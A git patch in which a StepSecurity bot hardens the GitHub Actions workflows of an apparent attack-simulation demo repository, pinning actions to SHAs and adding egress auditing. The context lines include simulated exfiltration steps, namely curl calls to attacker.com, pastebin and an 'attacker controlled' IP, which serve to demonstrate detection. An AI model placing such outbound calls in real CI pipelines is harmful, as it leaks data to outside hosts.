From b1835d700bf7bb331ffc45cfe0e8636f10b1d3f3 Mon Sep 17 00:00:00 2001 From: "stepsecurity-int[bot]" <185740846+stepsecurity-int[bot]@users.noreply.github.com> Date: Thu, 5 Jun 2025 15:25:02 +0000 Subject: [PATCH] Apply security best practicesSigned-off-by: StepSecurity Bot --- .github/workflows/PRTargetWorkflow.yml | 9 +++++++++ .github/workflows/anomalous-outbound-calls.yaml | 6 +++++- .github/workflows/arc-codecov-simulation.yml | 4 ++-- .github/workflows/arc-secure-by-default.yml | 16 ++++++++++++++++ .github/workflows/arc-solarwinds-simulation.yml | 7 ++++++- .../workflows/arc-zero-effort-observability.yml | 7 ++++++- .github/workflows/baseline_checks.yml | 8 ++++---- .github/workflows/block-dns-exfiltration.yaml | 6 +++++- .../changed-files-vulnerability-with-hr.yml | 4 ++-- .../changed-files-vulnerability-without-hr.yml | 7 ++++++- .../workflows/hosted-file-monitor-with-hr.yml | 6 +++--- .../workflows/hosted-file-monitor-without-hr.yml | 9 +++++++-- .github/workflows/hosted-https-monitoring-hr.yml | 9 +++++++-- .../workflows/hosted-network-filtering-hr.yml | 10 +++++----- .../workflows/hosted-network-monitoring-hr.yml | 6 +++--- .github/workflows/hosted-network-without-hr.yml | 11 ++++++++--- .github/workflows/publish.yml | 4 ++-- .github/workflows/secret-in-build-log.yml | 6 +++++- .../self-hosted-file-monitor-with-hr.yml | 7 ++++++- .../self-hosted-network-filtering-hr.yml | 4 ++-- .../self-hosted-network-monitoring-hr.yml | 7 ++++++- .../tj-actions-changed-files-incident.yaml | 4 ++-- .github/workflows/toc-tou.yml | 10 ++++++++++ .github/workflows/unexpected-outbound-calls.yml | 6 +++++- 24 files changed, 132 insertions(+), 41 deletions(-) diff --git a/.github/workflows/PRTargetWorkflow.yml b/.github/workflows/PRTargetWorkflow.yml index 8bf0debd9..c0024b4b8 100644 --- a/.github/workflows/PRTargetWorkflow.yml +++ b/.github/workflows/PRTargetWorkflow.yml @@ -7,11 +7,20 @@ on: - synchronize - reopened +permissions: {} + jobs: pr-target-check: + permissions: + contents: read # for actions/checkout to fetch code runs-on: ubuntu-latest steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 + with: + egress-policy: audit + - name: Check out code uses: actions/checkout@v4 diff --git a/.github/workflows/anomalous-outbound-calls.yaml b/.github/workflows/anomalous-outbound-calls.yaml index 2e87a976c..1d42876fb 100644 --- a/.github/workflows/anomalous-outbound-calls.yaml +++ b/.github/workflows/anomalous-outbound-calls.yaml @@ -1,13 +1,17 @@ name: Anomalous Outbound Calls on: workflow_dispatch: +permissions: {} + jobs: unexpected-outbound-calls: + permissions: + contents: read name: AnomalousOutboundCalls runs-on: ubuntu-latest steps: - name: Harden Runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 with: egress-policy: audit - run: "curl https://pastebin.com -L || true" diff --git a/.github/workflows/arc-codecov-simulation.yml b/.github/workflows/arc-codecov-simulation.yml index dd1ab7dc9..e085e2440 100644 --- a/.github/workflows/arc-codecov-simulation.yml +++ b/.github/workflows/arc-codecov-simulation.yml @@ -7,7 +7,7 @@ jobs: runs-on: self-hosted steps: - name: Harden Runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 with: egress-policy: block allowed-endpoints: > @@ -28,7 +28,7 @@ jobs: cd ./src/exfiltration-demo npm install - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/arc-secure-by-default.yml b/.github/workflows/arc-secure-by-default.yml index 96a7098dc..b96c675e2 100644 --- a/.github/workflows/arc-secure-by-default.yml +++ b/.github/workflows/arc-secure-by-default.yml @@ -2,18 +2,34 @@ name: "ARC: Secure-By-Default Cluster-Level Policy" on: workflow_dispatch: +permissions: {} + jobs: direct-ip-hosted: + permissions: + contents: read # for actions/checkout to fetch code runs-on: ubuntu-latest steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 + with: + egress-policy: audit + - uses: actions/checkout@v3 # Codecov Scenario: Exfiltrate data to attacker's IP address - name: Data Exfiltration To Attacker Controlled IP address run: curl 104.16.209.12 --connect-timeout 5 direct-ip-arc: + permissions: + contents: read # for actions/checkout to fetch code runs-on: self-hosted steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 + with: + egress-policy: audit + - uses: actions/checkout@v3 # Codecov Scenario: Exfiltrate data to attacker's IP address diff --git a/.github/workflows/arc-solarwinds-simulation.yml b/.github/workflows/arc-solarwinds-simulation.yml index 72ce7c177..707b11511 100644 --- a/.github/workflows/arc-solarwinds-simulation.yml +++ b/.github/workflows/arc-solarwinds-simulation.yml @@ -6,6 +6,11 @@ jobs: arc-solarwinds-simulation: runs-on: self-hosted steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 + with: + egress-policy: audit + - uses: actions/checkout@v3 - uses: actions/setup-node@v3 with: @@ -15,7 +20,7 @@ jobs: cd ./src/backdoor-demo npm install - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/arc-zero-effort-observability.yml b/.github/workflows/arc-zero-effort-observability.yml index 5cb8daacc..b9c6fb1f3 100644 --- a/.github/workflows/arc-zero-effort-observability.yml +++ b/.github/workflows/arc-zero-effort-observability.yml @@ -6,6 +6,11 @@ jobs: build: runs-on: self-hosted steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 + with: + egress-policy: audit + - uses: actions/checkout@v3 - uses: actions/setup-node@v3 with: @@ -15,7 +20,7 @@ jobs: cd ./src/exfiltration-demo npm install - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/baseline_checks.yml b/.github/workflows/baseline_checks.yml index 06fc0bc75..385ae72e3 100644 --- a/.github/workflows/baseline_checks.yml +++ b/.github/workflows/baseline_checks.yml @@ -7,11 +7,11 @@ jobs: build: runs-on: ubuntu-latest steps: - - uses: step-security/harden-runner@int-sh + - uses: step-security/harden-runner@668ad3cce4bd0191ec8fdd9868adcb7521a9dacd # int-sh with: egress-policy: audit - - uses: crazy-max/ghaction-github-status@v4 + - uses: crazy-max/ghaction-github-status@fa6ac37620bc5d44b93e15caed498629665e9ff5 # v4.2.0 - uses: actions/checkout@v3 @@ -22,12 +22,12 @@ jobs: - name: get-npm-version id: package-version - uses: martinbeentjes/npm-get-version-action@v1.3.1 + uses: step-security/npm-get-version-action@937365306ec087b7af8c059beac03ae4c05533e5 # v1.3.1 with: path: src/exfiltration-demo - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/block-dns-exfiltration.yaml b/.github/workflows/block-dns-exfiltration.yaml index 767d5d981..f007045d5 100644 --- a/.github/workflows/block-dns-exfiltration.yaml +++ b/.github/workflows/block-dns-exfiltration.yaml @@ -1,13 +1,17 @@ name: Block DNS Exfiltration With Harden-Runner on: workflow_dispatch: +permissions: {} + jobs: build: + permissions: + contents: read # for actions/checkout to fetch code name: Deploy runs-on: ubuntu-latest steps: - name: Harden Runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 with: egress-policy: block allowed-endpoints: | diff --git a/.github/workflows/changed-files-vulnerability-with-hr.yml b/.github/workflows/changed-files-vulnerability-with-hr.yml index d8ed7379f..29f4de01d 100644 --- a/.github/workflows/changed-files-vulnerability-with-hr.yml +++ b/.github/workflows/changed-files-vulnerability-with-hr.yml @@ -15,7 +15,7 @@ jobs: name: Test changed-files steps: - name: Harden Runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 with: disable-sudo: true egress-policy: block @@ -29,7 +29,7 @@ jobs: # Example 1 - name: Get changed files id: changed-files - uses: tj-actions/changed-files@v40 + uses: step-security/changed-files@95b56dadb92a30ca9036f16423fd3c088a71ee94 # v46.0.5 - name: List all changed files run: | diff --git a/.github/workflows/changed-files-vulnerability-without-hr.yml b/.github/workflows/changed-files-vulnerability-without-hr.yml index 4b74464f1..fd0182d7a 100644 --- a/.github/workflows/changed-files-vulnerability-without-hr.yml +++ b/.github/workflows/changed-files-vulnerability-without-hr.yml @@ -14,6 +14,11 @@ jobs: runs-on: ubuntu-latest name: Test changed-files steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 + with: + egress-policy: audit + - uses: actions/checkout@v4 with: fetch-depth: 0 @@ -21,7 +26,7 @@ jobs: # Example 1 - name: Get changed files id: changed-files - uses: tj-actions/changed-files@v40 + uses: step-security/changed-files@95b56dadb92a30ca9036f16423fd3c088a71ee94 # v46.0.5 - name: List all changed files run: | diff --git a/.github/workflows/hosted-file-monitor-with-hr.yml b/.github/workflows/hosted-file-monitor-with-hr.yml index eeb3b63f6..1bae8efb2 100644 --- a/.github/workflows/hosted-file-monitor-with-hr.yml +++ b/.github/workflows/hosted-file-monitor-with-hr.yml @@ -6,7 +6,7 @@ jobs: build: runs-on: ubuntu-latest steps: - - uses: step-security/harden-runner@v2 + - uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 with: egress-policy: audit @@ -17,13 +17,13 @@ jobs: cd ./src/backdoor-demo npm install - - uses: madhead/semver-utils@latest + - uses: step-security/semver-utils@a24a84bec134bf99b85937a44b58cc9a1d268edd # v4.3.0 id: version with: version: 1.2.3 - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/hosted-file-monitor-without-hr.yml b/.github/workflows/hosted-file-monitor-without-hr.yml index a673fca8c..bd31620a2 100644 --- a/.github/workflows/hosted-file-monitor-without-hr.yml +++ b/.github/workflows/hosted-file-monitor-without-hr.yml @@ -6,6 +6,11 @@ jobs: build: runs-on: ubuntu-latest steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 + with: + egress-policy: audit + - uses: actions/checkout@v3 - name: npm install @@ -13,13 +18,13 @@ jobs: cd ./src/backdoor-demo npm install - - uses: madhead/semver-utils@latest + - uses: step-security/semver-utils@a24a84bec134bf99b85937a44b58cc9a1d268edd # v4.3.0 id: version with: version: 1.2.3 - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/hosted-https-monitoring-hr.yml b/.github/workflows/hosted-https-monitoring-hr.yml index 379884875..d0b9027ee 100644 --- a/.github/workflows/hosted-https-monitoring-hr.yml +++ b/.github/workflows/hosted-https-monitoring-hr.yml @@ -2,17 +2,22 @@ name: "Hosted: HTTPS Monitoring with Harden-Runner" on: workflow_dispatch: +permissions: {} + jobs: build: + permissions: + contents: read # for JasonEtco/create-an-issue to read template files + issues: write # for JasonEtco/create-an-issue to create new issues runs-on: ubuntu-latest steps: - - uses: step-security/harden-runner@v2 + - uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 with: egress-policy: audit - uses: actions/checkout@v3 - - uses: JasonEtco/create-an-issue@v2 + - uses: JasonEtco/create-an-issue@1b14a70e4d8dc185e5cc76d3bec9eab20257b2c5 # v2.9.2 env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/.github/workflows/hosted-network-filtering-hr.yml b/.github/workflows/hosted-network-filtering-hr.yml index 7dd7dcbfa..b85edd8e6 100644 --- a/.github/workflows/hosted-network-filtering-hr.yml +++ b/.github/workflows/hosted-network-filtering-hr.yml @@ -7,7 +7,7 @@ jobs: runs-on: ubuntu-latest steps: - name: Harden Runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 with: disable-sudo: true egress-policy: block @@ -17,7 +17,7 @@ jobs: registry.npmjs.org:443 www.githubstatus.com:443 - - uses: crazy-max/ghaction-github-status@v4 + - uses: crazy-max/ghaction-github-status@fa6ac37620bc5d44b93e15caed498629665e9ff5 # v4.2.0 - uses: actions/checkout@v3 @@ -28,17 +28,17 @@ jobs: - name: get-npm-version id: package-version - uses: martinbeentjes/npm-get-version-action@v1.3.1 + uses: step-security/npm-get-version-action@937365306ec087b7af8c059beac03ae4c05533e5 # v1.3.1 with: path: src/exfiltration-demo - - uses: madhead/semver-utils@latest + - uses: step-security/semver-utils@a24a84bec134bf99b85937a44b58cc9a1d268edd # v4.3.0 id: version with: version: 1.2.3 - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/hosted-network-monitoring-hr.yml b/.github/workflows/hosted-network-monitoring-hr.yml index 0aa554773..e82cfa569 100644 --- a/.github/workflows/hosted-network-monitoring-hr.yml +++ b/.github/workflows/hosted-network-monitoring-hr.yml @@ -10,7 +10,7 @@ jobs: with: egress-policy: audit - - uses: crazy-max/ghaction-github-status@v4 + - uses: crazy-max/ghaction-github-status@fa6ac37620bc5d44b93e15caed498629665e9ff5 # v4.2.0 - uses: actions/checkout@v3 @@ -21,12 +21,12 @@ jobs: - name: get-npm-version id: package-version - uses: martinbeentjes/npm-get-version-action@v1.3.1 + uses: step-security/npm-get-version-action@937365306ec087b7af8c059beac03ae4c05533e5 # v1.3.1 with: path: src/exfiltration-demo - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/hosted-network-without-hr.yml b/.github/workflows/hosted-network-without-hr.yml index 3533b8c72..e0c9b7dc5 100644 --- a/.github/workflows/hosted-network-without-hr.yml +++ b/.github/workflows/hosted-network-without-hr.yml @@ -6,7 +6,12 @@ jobs: build: runs-on: ubuntu-latest steps: - - uses: crazy-max/ghaction-github-status@v4 + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 + with: + egress-policy: audit + + - uses: crazy-max/ghaction-github-status@fa6ac37620bc5d44b93e15caed498629665e9ff5 # v4.2.0 - uses: actions/checkout@v3 @@ -17,12 +22,12 @@ jobs: - name: get-npm-version id: package-version - uses: martinbeentjes/npm-get-version-action@v1.3.1 + uses: step-security/npm-get-version-action@937365306ec087b7af8c059beac03ae4c05533e5 # v1.3.1 with: path: src/exfiltration-demo - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/publish.yml b/.github/workflows/publish.yml index f42852631..3c78896d1 100644 --- a/.github/workflows/publish.yml +++ b/.github/workflows/publish.yml @@ -6,7 +6,7 @@ jobs: build: runs-on: ubuntu-latest steps: - - uses: step-security/harden-runner@v2 + - uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 with: egress-policy: audit - uses: actions/checkout@v3 @@ -15,7 +15,7 @@ jobs: cd ./src/exfiltration-demo npm install - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/secret-in-build-log.yml b/.github/workflows/secret-in-build-log.yml index 847c1ca10..b783f9a48 100644 --- a/.github/workflows/secret-in-build-log.yml +++ b/.github/workflows/secret-in-build-log.yml @@ -3,15 +3,19 @@ name: Secret in Build Log on: workflow_dispatch: +permissions: {} + jobs: build: + permissions: + contents: read # for actions/checkout to fetch code runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 - name: harden-runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 with: egress-policy: audit diff --git a/.github/workflows/self-hosted-file-monitor-with-hr.yml b/.github/workflows/self-hosted-file-monitor-with-hr.yml index a53608566..5e04911ab 100644 --- a/.github/workflows/self-hosted-file-monitor-with-hr.yml +++ b/.github/workflows/self-hosted-file-monitor-with-hr.yml @@ -6,6 +6,11 @@ jobs: build: runs-on: [self-hosted, ec2] steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 + with: + egress-policy: audit + - uses: actions/checkout@v3 - uses: actions/setup-node@v3 with: @@ -15,7 +20,7 @@ jobs: cd ./src/backdoor-demo npm install - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/self-hosted-network-filtering-hr.yml b/.github/workflows/self-hosted-network-filtering-hr.yml index 815f293ea..4e3090063 100644 --- a/.github/workflows/self-hosted-network-filtering-hr.yml +++ b/.github/workflows/self-hosted-network-filtering-hr.yml @@ -7,7 +7,7 @@ jobs: runs-on: [self-hosted, ec2] steps: - name: Harden Runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 with: egress-policy: block allowed-endpoints: > @@ -24,7 +24,7 @@ jobs: cd ./src/exfiltration-demo npm install - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/self-hosted-network-monitoring-hr.yml b/.github/workflows/self-hosted-network-monitoring-hr.yml index 5f0ba2320..ee807de05 100644 --- a/.github/workflows/self-hosted-network-monitoring-hr.yml +++ b/.github/workflows/self-hosted-network-monitoring-hr.yml @@ -6,6 +6,11 @@ jobs: build: runs-on: [self-hosted, ec2] steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 + with: + egress-policy: audit + - uses: actions/checkout@v3 - uses: actions/setup-node@v3 with: @@ -15,7 +20,7 @@ jobs: cd ./src/exfiltration-demo npm install - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/tj-actions-changed-files-incident.yaml b/.github/workflows/tj-actions-changed-files-incident.yaml index 7426c56fb..4f05cf1d3 100644 --- a/.github/workflows/tj-actions-changed-files-incident.yaml +++ b/.github/workflows/tj-actions-changed-files-incident.yaml @@ -14,7 +14,7 @@ jobs: name: Test changed-files steps: - name: Harden Runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 with: disable-sudo: true egress-policy: audit @@ -26,7 +26,7 @@ jobs: # Example 1 - name: Get changed files id: changed-files - uses: tj-actions/changed-files@v35 + uses: step-security/changed-files@95b56dadb92a30ca9036f16423fd3c088a71ee94 # v46.0.5 - name: List all changed files run: | diff --git a/.github/workflows/toc-tou.yml b/.github/workflows/toc-tou.yml index 50ca25cb9..9fcb13fd2 100644 --- a/.github/workflows/toc-tou.yml +++ b/.github/workflows/toc-tou.yml @@ -15,6 +15,11 @@ jobs: contents: read pull-requests: read steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 + with: + egress-policy: audit + - uses: actions/checkout@v4 - name: Wait for demo purposes @@ -40,6 +45,11 @@ jobs: contents: read pull-requests: read steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 + with: + egress-policy: audit + - uses: actions/checkout@v4 - name: Wait for demo purposes diff --git a/.github/workflows/unexpected-outbound-calls.yml b/.github/workflows/unexpected-outbound-calls.yml index f53167970..83bba8d0d 100644 --- a/.github/workflows/unexpected-outbound-calls.yml +++ b/.github/workflows/unexpected-outbound-calls.yml @@ -1,13 +1,17 @@ name: Unexpected Outbound Calls on: workflow_dispatch: +permissions: {} + jobs: unexpected-outbound-calls: + permissions: + contents: read name: UnexpectedOutboundCalls runs-on: ubuntu-latest steps: - name: Harden Runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0 with: egress-policy: audit - run: "curl https://attacker.com -L || true"